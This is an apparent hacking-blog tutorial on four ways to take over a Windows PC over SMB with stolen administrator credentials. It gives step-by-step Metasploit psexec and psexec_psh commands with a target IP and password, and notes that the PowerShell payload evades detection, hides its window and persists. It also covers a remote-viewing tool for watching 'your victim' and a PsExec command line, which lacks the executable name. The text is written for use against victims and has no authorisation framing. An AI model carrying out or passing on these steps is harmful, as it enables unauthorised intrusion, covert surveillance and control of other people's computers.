To understand what is SMB protocol, click here
To know how collect username and passwords to your remote host via SMB protocol, click here
In this article, we will learn how to exploit your remote PC once you have collected username and password to your victim’s PC. There are four ways to do so and they all are listed below:
Microsoft Windows Authenticated User Code Execution
This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the “psexec” utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost 192.168.0.104
msf exploit(psexec) > set rport 445
msf exploit(psexec) > set smbuser administrator
msf exploit(psexec) > set smbpass Ignite@123
msf exploit(psexec) > exploit
Here,
rhost –> IP of victim PC
rport –> port through which we are attacking
smbuser –> username
smbpass –> password
Once the commands run you will gain a meterpreter session of your victim’s PC and so you can access it as you want.
Microsoft Windows Authenticated Powershell Command Execution
This module uses a valid administrator username and password to execute a powershell payload using a similar technique to the “psexec” utility provided by SysInternals. The payload is encoded in base64 and executed from the commandline using the –encoded command flag. Using this method, the payload is never written to disk, and given that each payload is unique, is less prone to signature based detection. A persist option is provided to execute the payload in a while loop in order to maintain a form of persistence. In the event of a sandbox observing PSH execution, a delay and other obfuscation may be added to avoid detection. In order to avoid interactive process notifications for the current user, the psh payload has been reduced in size and wrapped in a powershell invocation which hides the window entirely.
msf > use exploit/windows/smb/psexec_psh
msf exploit(psexec_psh) > set rhost 192.168.0.104
msf exploit(psexec_psh) > set rport 445
msf exploit(psexec_psh) > set smbuser administrator
msf exploit(psexec_psh) > set smbpass Ignite@123
msf exploit(psexec_psh) > exploit
Once again as the commands run you will gain a meterpreter sesion of victim’s PC. And therefore, you can do as you desire.
Atelier Web Remote Commander
This is graphical software that let us gain control of victim’s PC that too quite easily.
Once you have open the software give the IP address of your victim’s PC in remote host box along with the username and password in their respective boxes. And then click on connect; the whole victim’s PC’s screen will appear on your Desktop and you will have pretty good view of what your victim is doing.
Psexec.exe
Psexec.exe is software that helps us to access other computers in a network. This software directly takes us to the shell of the remote PC with advantage of doing nothing manually. Download this software from –> http://download.sysinternals.com/files/PSTools.zip.
Unzip the file once you have downloaded it. Go to you command prompt and type:
\\192.168.0.106 -u administrator -p Ignite@123 cmd
Here,
192.168.0.106 –> is the IP of remoste host
-u –> denotes username
-p –> denotes password
cmd –> to enter victim’s command prompt
Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.
The post 4 ways to Connect Remote PC using SMB Port appeared first on Hacking Articles.